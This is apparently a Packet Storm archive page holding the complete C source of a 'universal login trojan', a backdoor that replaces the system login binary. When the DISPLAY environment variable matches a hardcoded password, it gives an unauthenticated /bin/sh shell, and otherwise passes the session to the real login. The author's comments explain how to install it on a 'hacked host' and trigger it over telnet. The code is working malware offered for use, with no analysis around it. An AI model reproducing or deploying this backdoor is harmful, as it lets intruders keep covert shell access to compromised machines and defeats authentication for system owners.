Universal login trojan - Login trojan for pretty much any O/S. Tested on Linux, BSDI 2.0, FreeBSD, IRIX 6.x, 5.x, Sunos 5.5,5.6,5.7, and OSF1/DGUX4.0. Works by checking the DISPLAY environment variable before passing the session to the real login binary.
fb412b9239e72a75c7f47ba4a4785c5cbfc7665494372801af49f21457eed13d/*
* PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
* Universal login trojan by Tragedy/Dor
* Email: rawpower@iname.com
* IRC: [Dor]@ircnet
*
* Login trojan for pretty much any O/S...
* Tested on: Linux, BSDI 2.0, FreeBSD, IRIX 6.x, 5.x, Sunos 5.5,5.6,5.7
* OSF1/DGUX4.0,
* Known not to work on:
* SunOS 4.x and 5.4... Seems the only variable passwd to login
* on these versions of SunOS is the $TERM... and its passed via
* commandline option... should be easy to work round in time
*
* #define PASSWORD - Set your password here
* #define _PATH_LOGIN - This is where you moved the original login to
* login to hacked host with...
* from bourne shell (sh, bash) sh DISPLAY="your pass";export DISPLAY;telnet host
*
*/
#include <stdio.h>
#if !defined(PASSWORD)
#define PASSWORD "j4l0n3n"
#endif
#if !defined(_PATH_LOGIN)
# define _PATH_LOGIN "/bin/login"
#endif
main (argc, argv, envp)
int argc;
char **argv, **envp;
{
char *display = getenv("DISPLAY");
if ( display == NULL ) {
execve(_PATH_LOGIN, argv, envp);
perror(_PATH_LOGIN);
exit(1);
}
if (!strcmp(display,PASSWORD)) {
system("/bin/sh");
exit(1);
}
execve(_PATH_LOGIN, argv, envp);
exit(1);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed